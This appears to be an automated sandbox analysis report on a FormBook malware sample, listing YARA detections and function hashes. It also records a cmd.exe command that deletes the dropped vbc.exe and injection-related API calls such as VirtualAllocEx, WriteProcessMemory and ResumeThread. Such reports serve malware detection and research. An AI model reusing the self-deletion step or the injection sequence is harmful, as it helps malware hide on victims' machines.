Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.2349749079.00000000003A0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.2349749079.00000000003A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.2349749079.00000000003A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.2349769436.00000000003D0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.2349769436.00000000003D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.2349769436.00000000003D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 2028 Parent PID: 1900

General

Start time:	08:29:37
Start date:	13/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\Public\vbc.exe'
Imagebase:	0x49f70000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 3064 Parent PID: 2412 vbc.exeCOMMON

Executed Functions

Function 003714CF, Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

`!?m, xrefs: 0037161A
`!?m, xrefs: 00371526

Memory Dump Source

Source File: 00000004.00000002.2152619794.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID: `!?m$`!?m
API String ID: 0-952261428
Opcode ID: 427dfff37af2e4a53597259d7fe1f19d6079fe943d87e3b701fbc1cd196056cc
Instruction ID: f1fcea12e8b05912196730136f49bdf6d99a61a837d19d888ee7fe9f122719ca
Opcode Fuzzy Hash: 427dfff37af2e4a53597259d7fe1f19d6079fe943d87e3b701fbc1cd196056cc
Instruction Fuzzy Hash: B751D175E00218DFDB15DFE9D884ADEBBF6BF88300F24802AE809AB265D7345942CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00377108, Relevance: 1.6, Strings: 1, Instructions: 302COMMON

Download Yara Rule

Strings

h#2, xrefs: 003774E9

Memory Dump Source

Source File: 00000004.00000002.2152619794.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID: h#2
API String ID: 0-178655350
Opcode ID: f4ddfea69bde301c3aa3217d872210ad4bf1411e9f2a421b3b429d7cd98dcc28
Instruction ID: 9cbf8b7fe5c19b461a2c351583eb01ca684c123fe0f165c20d96a9f327f4cc44
Opcode Fuzzy Hash: f4ddfea69bde301c3aa3217d872210ad4bf1411e9f2a421b3b429d7cd98dcc28
Instruction Fuzzy Hash: 0FD10574E0820ADBCB15CFA5C9848AEFBB6FF88300F64D556D51AA7314D7389942CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00371D59, Relevance: 1.5, Strings: 1, Instructions: 221COMMON

Download Yara Rule

Strings

u7@-, xrefs: 0037201F

Memory Dump Source

Source File: 00000004.00000002.2152619794.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID: u7@-
API String ID: 0-3911675863
Opcode ID: f0f67148a31e8dd38860b22a7f2a04e592cd46f9ec1fed6ffde7297411839a3b
Instruction ID: cd1775c1ae36ed0ce34670d6a7628ccff66f2c88560b74d1fe73e05b000320b3
Opcode Fuzzy Hash: f0f67148a31e8dd38860b22a7f2a04e592cd46f9ec1fed6ffde7297411839a3b
Instruction Fuzzy Hash: FE910275E05248DFCB18CFA9D8849AEBBF6BF89300F20D56AD419AB364DB349901CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00375078, Relevance: 1.5, Strings: 1, Instructions: 201COMMON

Download Yara Rule

Strings

1H,L, xrefs: 00375179

Memory Dump Source

Source File: 00000004.00000002.2152619794.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID: 1H,L
API String ID: 0-1359084213
Opcode ID: bbfd7198cc2d08acde370ea258c55e89fb7df979bf76d60dc6eda424bf11e933
Instruction ID: c2ed41c886417131db4c192c3345b61bab053020145bee29dba5694a3c3d1ba1
Opcode Fuzzy Hash: bbfd7198cc2d08acde370ea258c55e89fb7df979bf76d60dc6eda424bf11e933
Instruction Fuzzy Hash: 0081D274E016098FCB08CFA9C884AEEFBB6EF88300F24952AD419BB364D7759905CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004F2A68, Relevance: 1.4, Strings: 1, Instructions: 167COMMON

Download Yara Rule

Strings

<^b, xrefs: 004F2B8E

Memory Dump Source

Source File: 00000004.00000002.2152694195.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID: <^b
API String ID: 0-1437906248
Opcode ID: 6d6dfdb6b3d5a10081f23b8c705abcf8beb903565dd7a46136fa6cb806974999
Instruction ID: 18a269dd962286f63cdd9c1042dac7026bc754eb7f5969813d2deeec6bd1c490
Opcode Fuzzy Hash: 6d6dfdb6b3d5a10081f23b8c705abcf8beb903565dd7a46136fa6cb806974999
Instruction Fuzzy Hash: BD615770E04669CBDB68CF66CC447ADB7B6BF89301F10C5EAC50DA7214EB745A868F04

Uniqueness

Uniqueness Score: -1.00%

Function 004F2C78, Relevance: 1.4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

Strings

<^b, xrefs: 004F2B8E

Memory Dump Source

Source File: 00000004.00000002.2152694195.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID: <^b
API String ID: 0-1437906248
Opcode ID: cb126549d900dc42a4c79a38a97362136cd7dfebfc5789597ebe990095f6b68f
Instruction ID: 0e0a20fc1bcd363ed4172f01a37b5723181f3cf0fb5a364af13cd63a842b1566
Opcode Fuzzy Hash: cb126549d900dc42a4c79a38a97362136cd7dfebfc5789597ebe990095f6b68f
Instruction Fuzzy Hash: D8512674D00669CBCB64CF65CD84BADB7B2BF99301F1096EAC50AA7214EB745AC68F04

Uniqueness

Uniqueness Score: -1.00%

Function 004F2C2C, Relevance: 1.4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

Strings

<^b, xrefs: 004F2B8E

Memory Dump Source

Source File: 00000004.00000002.2152694195.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID: <^b
API String ID: 0-1437906248
Opcode ID: a63e064cb6f6d8e05b7e076616685c4c0d3386422ccb36da2f7e5d355c625a2e
Instruction ID: ceb25366c914f2b4627ff50a62e7c20c443a6cb637c66c4437279831c7904067
Opcode Fuzzy Hash: a63e064cb6f6d8e05b7e076616685c4c0d3386422ccb36da2f7e5d355c625a2e
Instruction Fuzzy Hash: E5512774D00669CBCB64CF65C9847ADB7B2BF99300F1096EAC50AB3250EB745AC6CF04

Uniqueness

Uniqueness Score: -1.00%

Function 004F2CC7, Relevance: 1.4, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

<^b, xrefs: 004F2B8E

Memory Dump Source

Source File: 00000004.00000002.2152694195.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID: <^b
API String ID: 0-1437906248
Opcode ID: ab20ddcfb1260339385455d74c5ee7873044123eabf6bbeadd6819d0f62acf64
Instruction ID: 599ee6ecb5d5f7216974a17d792d87235d5e5bd87c1b13a1c6e63224586f2538
Opcode Fuzzy Hash: ab20ddcfb1260339385455d74c5ee7873044123eabf6bbeadd6819d0f62acf64
Instruction Fuzzy Hash: 39513A74E0066ACBCB64CF65CD447ADB7B2FF99301F1096E6C50AA3214EB749AC68F04

Uniqueness

Uniqueness Score: -1.00%

Function 00379858, Relevance: 1.4, Strings: 1, Instructions: 100COMMON

Download Yara Rule

Strings

S#, xrefs: 00379C7C

Memory Dump Source

Source File: 00000004.00000002.2152619794.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID: S#
API String ID: 0-2384231100
Opcode ID: a658b8e56f607dc35ee9c5f4272b8ab518ca4d5f03f64cfb903c86e18afff038
Instruction ID: e5ad2d695e6ba5f0ed9e1c0d66555d87d724613ba38d6b7c0d1db28643ec714c
Opcode Fuzzy Hash: a658b8e56f607dc35ee9c5f4272b8ab518ca4d5f03f64cfb903c86e18afff038
Instruction Fuzzy Hash: C5414970E146189FDB58CFAAD84069EFBF7AFC9300F14C5AAC408A7225DB3459868F52

Uniqueness

Uniqueness Score: -1.00%

Function 003761F0, Relevance: 1.3, Strings: 1, Instructions: 76COMMON

Download Yara Rule

Strings

J9|, xrefs: 003762B1

Memory Dump Source

Source File: 00000004.00000002.2152619794.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID: J9|
API String ID: 0-3874138017
Opcode ID: d995d8f9eea67b3e722dca0799f22963d0ab927536120a15fb6ad8a5b3dfb2d0
Instruction ID: e4734d2ecd82c6bdea12b37ce47d1a725d7691ab323d6abd1e763abe53fddff4
Opcode Fuzzy Hash: d995d8f9eea67b3e722dca0799f22963d0ab927536120a15fb6ad8a5b3dfb2d0
Instruction Fuzzy Hash: 8A31E671E016188BEB19CFABD8542DEFBF7AFC9314F14C16AD409A6264DB741A46CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00372740, Relevance: .3, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2152619794.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1aa042322a3d5a8a73ae2e7e95096b289c468f8aa47ad17dc7db63c1e7b489f6
Instruction ID: c1f4f7b25448e419cebec3d5b50727c9416e204d14049bd4055745af7564dbd7
Opcode Fuzzy Hash: 1aa042322a3d5a8a73ae2e7e95096b289c468f8aa47ad17dc7db63c1e7b489f6
Instruction Fuzzy Hash: FCC14674E00249CBCB69CFE9C5805DEFBFAAF88314F64D429D418BB258E73899418F64

Uniqueness

Uniqueness Score: -1.00%

Function 003722A0, Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2152619794.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0ab41b482fecfc3857cf28cf2dc70468f80db09f4d181eacaa7557537f3d3a6
Instruction ID: 70b20bce5933fbcdc4a754a71b72cc076830ed522e32e8135119684be07deef5
Opcode Fuzzy Hash: b0ab41b482fecfc3857cf28cf2dc70468f80db09f4d181eacaa7557537f3d3a6
Instruction Fuzzy Hash: C3C14B74E05219CBDB25CFE5C940ADEFBB6BF88314F64D42AD50DAB618D7389A428F10

Uniqueness

Uniqueness Score: -1.00%

Function 00372290, Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2152619794.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 696c91b3adb0dbeac775c896746367bdc168b877e2c1474026751a99572e635d
Instruction ID: 4bb4e09fe66181ce0aaf993c7975e37de1c35f5566269554e5ba4b798019585b
Opcode Fuzzy Hash: 696c91b3adb0dbeac775c896746367bdc168b877e2c1474026751a99572e635d
Instruction Fuzzy Hash: 66C16B74E01219CBDB25CFE5C940A9EFBF6BF88314F64D46AD40CAB618D7389A428F10

Uniqueness

Uniqueness Score: -1.00%

Function 0037273C, Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2152619794.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f9aaf39487ec5e5e7bc365ddb6926c4649591743d10c7c4f24dac9126b4fc3d
Instruction ID: 9ff1e80f78cc227a89754451ace8a98297913f75cb9c3e223278a7f94987bc6b
Opcode Fuzzy Hash: 4f9aaf39487ec5e5e7bc365ddb6926c4649591743d10c7c4f24dac9126b4fc3d
Instruction Fuzzy Hash: 95C15774E002498BCB19CFE9C5805DEFBFAAF88314F64D42AD418FB258E73899418F64

Uniqueness

Uniqueness Score: -1.00%

Function 00370308, Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2152619794.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e767efcae514244f2b33508eddfce4ed676b18d8e6773223a08eb5bb26aa8278
Instruction ID: b633539ac726b467045271b83b70bda296fd644648747dee79a6d16bf4945da6
Opcode Fuzzy Hash: e767efcae514244f2b33508eddfce4ed676b18d8e6773223a08eb5bb26aa8278
Instruction Fuzzy Hash: 1BA1E934E11218CFCB14EFA5C894ADEBBB6FF89304F518569E4056B3A5EB30AD46CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00375808, Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2152619794.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c41b32520301185ebcd699949fdc6834e27d2314e16a9fa10e865d8561dae0b
Instruction ID: b4ad5bab16b259f9786f48a1f1ab833a930337526166aa1990524637d250bcf3
Opcode Fuzzy Hash: 4c41b32520301185ebcd699949fdc6834e27d2314e16a9fa10e865d8561dae0b
Instruction Fuzzy Hash: 265137B0E05618DFDB09CFAAC8406AEFBF2FF89300F24C46AD819A7251D7744A41CB65

Uniqueness

Uniqueness Score: -1.00%

Function 003710EB, Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2152619794.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d2a4e141e19f2840432128cb172fde73acd648df74c4d9872d1256f0601599
Instruction ID: f750a7d102a3d79581638103b8687de54ee826edaf23a32f8621b7c049536d49
Opcode Fuzzy Hash: b6d2a4e141e19f2840432128cb172fde73acd648df74c4d9872d1256f0601599
Instruction Fuzzy Hash: B6312DB1D057499FDB09CFA6C85029EFFF7AF86300F14C06AD418AB265D7744906CB80

Uniqueness

Uniqueness Score: -1.00%

Function 004F11F0, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 325processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 004F14BF

Strings

<^b, xrefs: 004F1412
<^b, xrefs: 004F1607
<^b, xrefs: 004F1542

Memory Dump Source

Source File: 00000004.00000002.2152694195.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: CreateProcess
String ID: <^b$<^b$<^b
API String ID: 963392458-3734228477
Opcode ID: a5c03b7bf8e926269efbc812ac3cc896767e30df1ae4fc22432680e862e7f6dd
Instruction ID: 75814e4babf4cb0a7bbe6dc648bb4b81a7c251a99c0c248ef67fdd72946a7532
Opcode Fuzzy Hash: a5c03b7bf8e926269efbc812ac3cc896767e30df1ae4fc22432680e862e7f6dd
Instruction Fuzzy Hash: DAC10270D0026DCBDB21CFA4C881BEEBBB1BF49304F0095AAD959B7250DB749A85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 004F11F8, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 323processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 004F14BF

Strings

<^b, xrefs: 004F1412
<^b, xrefs: 004F1607
<^b, xrefs: 004F1542

Memory Dump Source

Source File: 00000004.00000002.2152694195.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: CreateProcess
String ID: <^b$<^b$<^b
API String ID: 963392458-3734228477
Opcode ID: 9ae258b1252c396fbd3ff861e9eb8cbded1e648a5156e550140168e683d4827f
Instruction ID: 1014e1cc1a12a5078c9ea13f1771611486e40bd04e2ed79194e4275685853d2d
Opcode Fuzzy Hash: 9ae258b1252c396fbd3ff861e9eb8cbded1e648a5156e550140168e683d4827f
Instruction Fuzzy Hash: C1C10270D0022DCBDB20CFA4C881BEEBBB5BF49304F1095AAD959B7250DB749A85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 004F0E58, Relevance: 1.6, APIs: 1, Instructions: 120injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 004F0F33

Memory Dump Source

Source File: 00000004.00000002.2152694195.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: b15284117f685a28ef7024d17cb5ad6517a7d1dcd334e16ce9067a4ae2ac3c62
Instruction ID: f38540d1ebcf6f5fd724725937b1ff569b60ebd022b332df22efcdabf9b16946
Opcode Fuzzy Hash: b15284117f685a28ef7024d17cb5ad6517a7d1dcd334e16ce9067a4ae2ac3c62
Instruction Fuzzy Hash: B941BCB4D012489FCF10CFA9D884AEEBBF1BB49314F24942AE915B7250D778AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 004F0E60, Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 004F0F33

Memory Dump Source

Source File: 00000004.00000002.2152694195.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 7f2c192971d7674e64015e179db889c3ba5f6c3d9b890b49a54f4b8a658021ea
Instruction ID: 6665e1b9afada637d7e6f612087964e66488bbd979e39d47d7bc865347e00646
Opcode Fuzzy Hash: 7f2c192971d7674e64015e179db889c3ba5f6c3d9b890b49a54f4b8a658021ea
Instruction Fuzzy Hash: 6E41ABB4D0125C9FCF10CFA9D884AEEFBF1BB49314F24942AE915B7200D774AA45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004F0FB8, Relevance: 1.6, APIs: 1, Instructions: 112COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 004F1072

Memory Dump Source

Source File: 00000004.00000002.2152694195.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: cef73202113b0b8d9d1826afaaa4beb7627752c88e5e0153dce1f987d0adad5b
Instruction ID: f661ba2da62c39d53f87473d0a3f41b101806263a1d8f7171eb6b3f398aa6b2f
Opcode Fuzzy Hash: cef73202113b0b8d9d1826afaaa4beb7627752c88e5e0153dce1f987d0adad5b
Instruction Fuzzy Hash: F541B8B9D04258DFCF00CFA9D880AEEBBB5BF09310F24942AE915B7210D735A946CF65

Uniqueness

Uniqueness Score: -1.00%

Function 004F0FC0, Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 004F1072

Memory Dump Source

Source File: 00000004.00000002.2152694195.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 45a9d9d522ec075bbbf77770335ceaf6e32e7023497c127525301c2468c60c30
Instruction ID: 59bb1df860a717013b3a19257092ebd81ba3559aa785e7dbb24d34d4eaf0c420
Opcode Fuzzy Hash: 45a9d9d522ec075bbbf77770335ceaf6e32e7023497c127525301c2468c60c30
Instruction Fuzzy Hash: 0641A8B8D04258DFCF10CFA9D880AEEFBB5BB09310F10942AE915B7210D735AA45CF65

Uniqueness

Uniqueness Score: -1.00%

Function 004F0D36, Relevance: 1.6, APIs: 1, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 004F0DE2

Memory Dump Source

Source File: 00000004.00000002.2152694195.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d67d81a6ca847f1bcc9282d4cf1196b2dda717c77c1af679b147747630e951d2
Instruction ID: e0edb167b2281187e79efd07cd38fb391776786767976c4c8b29a96d7cf9acb0
Opcode Fuzzy Hash: d67d81a6ca847f1bcc9282d4cf1196b2dda717c77c1af679b147747630e951d2
Instruction Fuzzy Hash: 34418AB9D04258DFCF10CFA9D880AEEBBB5BF49314F10942AE915B7210D775A902CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 004F0D38, Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 004F0DE2

Memory Dump Source

Source File: 00000004.00000002.2152694195.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ba754295edf0634ebe6d3f85e16aa4b768e1b21d540768b3d227eb7ce1920dab
Instruction ID: 8477f3b76f5f20057f2de2278ab3ec1064ea59cfeaac51ecddf9c4a9b3e4d34a
Opcode Fuzzy Hash: ba754295edf0634ebe6d3f85e16aa4b768e1b21d540768b3d227eb7ce1920dab
Instruction Fuzzy Hash: 234188B9D042589BCF10CFA9D880AEEBBB5BB49314F10942AE915B7200D775A902CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0037CC00, Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0037CCA7

Memory Dump Source

Source File: 00000004.00000002.2152619794.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 59dccb16595b9481a27bd3ef162f23d5d3c90aaaabf27361faec7c6f578b0154
Instruction ID: 945dbda603c253dba033c0f2b2db7124c9bdf9d8900d2083890d525fbd481f69
Opcode Fuzzy Hash: 59dccb16595b9481a27bd3ef162f23d5d3c90aaaabf27361faec7c6f578b0154
Instruction Fuzzy Hash: 913188B9D042589FCF10CFA9D884ADEFBB5BB49310F24A42AE819B7210D375A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 004F0C08, Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 004F0CB7

Memory Dump Source

Source File: 00000004.00000002.2152694195.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: b76d580399247076f79181789e18d854e99550013182be5535469f943a1d2981
Instruction ID: e94c763e563aa0ef24700743c5df235c54b53927df7f7301cb0b652fba29e7b9
Opcode Fuzzy Hash: b76d580399247076f79181789e18d854e99550013182be5535469f943a1d2981
Instruction Fuzzy Hash: 5F41ACB4D01258DFCB14CFA9D884AEEFBB5BF49314F24842AE419B7240D778AA45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004F0B10, Relevance: 1.6, APIs: 1, Instructions: 88threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 004F0B96

Memory Dump Source

Source File: 00000004.00000002.2152694195.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: c5fe9ed2f1f4c2258e4583b87c839c061cae77f3cb149862d79166d9620ab0e0
Instruction ID: 240991b903d97f230a4591dc2fb15b93cb1423356d0e51243ec9cba227245342
Opcode Fuzzy Hash: c5fe9ed2f1f4c2258e4583b87c839c061cae77f3cb149862d79166d9620ab0e0
Instruction Fuzzy Hash: 84310DB4D0520C9FCF10CFA9D884AEEFBB0AF49304F14845AE915B7201D738A902CF99

Uniqueness

Uniqueness Score: -1.00%

Function 004F0B18, Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 004F0B96

Memory Dump Source

Source File: 00000004.00000002.2152694195.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: e960727352b508dc0b5b4de9214b9145d9aa8329f1ec1d17a12f497ad3d1856c
Instruction ID: 68645247a678e12e214dc2fb4c50b4cc11357acbf852fe13e9fd0255d2597ea7
Opcode Fuzzy Hash: e960727352b508dc0b5b4de9214b9145d9aa8329f1ec1d17a12f497ad3d1856c
Instruction Fuzzy Hash: C331A8B8D052189BCF10CFA9D884AEEFBB5BB49314F14982AE815B7200D735A901CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0030D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2152574418.000000000030D000.00000040.00000001.sdmp, Offset: 0030D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebf6cd75ae13bad69b9f4330302f572e1f8a7ef94c5af34b5cfc4f356e16fddf
Instruction ID: a5e339beb56f077782d7d085eaeca4ad0f77e18a157b08169f17bf2eb72220cd
Opcode Fuzzy Hash: ebf6cd75ae13bad69b9f4330302f572e1f8a7ef94c5af34b5cfc4f356e16fddf
Instruction Fuzzy Hash: 51210775604244DFDB16DF94D894B16BBE9FB84324F20C969D80E4B686C337D847CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0030D017, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2152574418.000000000030D000.00000040.00000001.sdmp, Offset: 0030D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 947bb96a6b71b5d16c5063f02afef5b667bb5e64fad4aea3c58dd9afdd909a92
Instruction ID: 27158bc22174c7bd7e5eb07cd8944b57ad3e2fbffb8c38a8497ff4d24dc4901b
Opcode Fuzzy Hash: 947bb96a6b71b5d16c5063f02afef5b667bb5e64fad4aea3c58dd9afdd909a92
Instruction Fuzzy Hash: 3B118B75504280DFCB12CF54D994B16BBA2FB85314F24C6AAD8094B696C33AD84ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 002FD1C5, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2152558865.00000000002FD000.00000040.00000001.sdmp, Offset: 002FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43eea96bbcfc2d92ad4b64de2d667a18fa70eb00b7376b5c9d6d9eafa5a7ebb2
Instruction ID: 587db8d1bf928901f0e9dd6930d84ed58fade83f60068f9c798d21e335b53f41
Opcode Fuzzy Hash: 43eea96bbcfc2d92ad4b64de2d667a18fa70eb00b7376b5c9d6d9eafa5a7ebb2
Instruction Fuzzy Hash: FF01F7310183489AEB208E55D884B77FBDDEF51364F18C46AEE090B283C374D851C6F1

Uniqueness

Uniqueness Score: -1.00%

Function 002FD1C4, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2152558865.00000000002FD000.00000040.00000001.sdmp, Offset: 002FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8e1905fc7157584954eb86d5235f11edf398ef9c502bfd51fefc5075cab0fe7
Instruction ID: 91fc29934d6f37b91f52949fe77fdc2122ca7dcecb5ab8d762a22a2783c67b60
Opcode Fuzzy Hash: f8e1905fc7157584954eb86d5235f11edf398ef9c502bfd51fefc5075cab0fe7
Instruction Fuzzy Hash: 1BF04F71404244ABEB108E15D888B63FF99EF51764F18C45AED085A286C2789844CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004F2640, Relevance: 9.0, Strings: 7, Instructions: 253COMMON

Download Yara Rule

Strings

lwb, xrefs: 004F28B9
tvb, xrefs: 004F2784
qmV, xrefs: 004F26A5
5u=, xrefs: 004F27ED
tvb, xrefs: 004F2911
lwb, xrefs: 004F283D
]DA, xrefs: 004F2822

Memory Dump Source

Source File: 00000004.00000002.2152694195.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID: 5u=$]DA$lwb$lwb$tvb$tvb$qmV
API String ID: 0-1028501643
Opcode ID: ede5542d45d4bf1d82e7d55923227180242fa50b02921ff59b19004786c09c9c
Instruction ID: 63dde66a5ad51ccd8bc65bb302a408ae6c90b2cb7a9fd89963674df32d4ebeb1
Opcode Fuzzy Hash: ede5542d45d4bf1d82e7d55923227180242fa50b02921ff59b19004786c09c9c
Instruction Fuzzy Hash: B9A13670E0520DDFDB14CFEAD5904AEFBF2EF89300F20902AD515EB214D6789A029F96

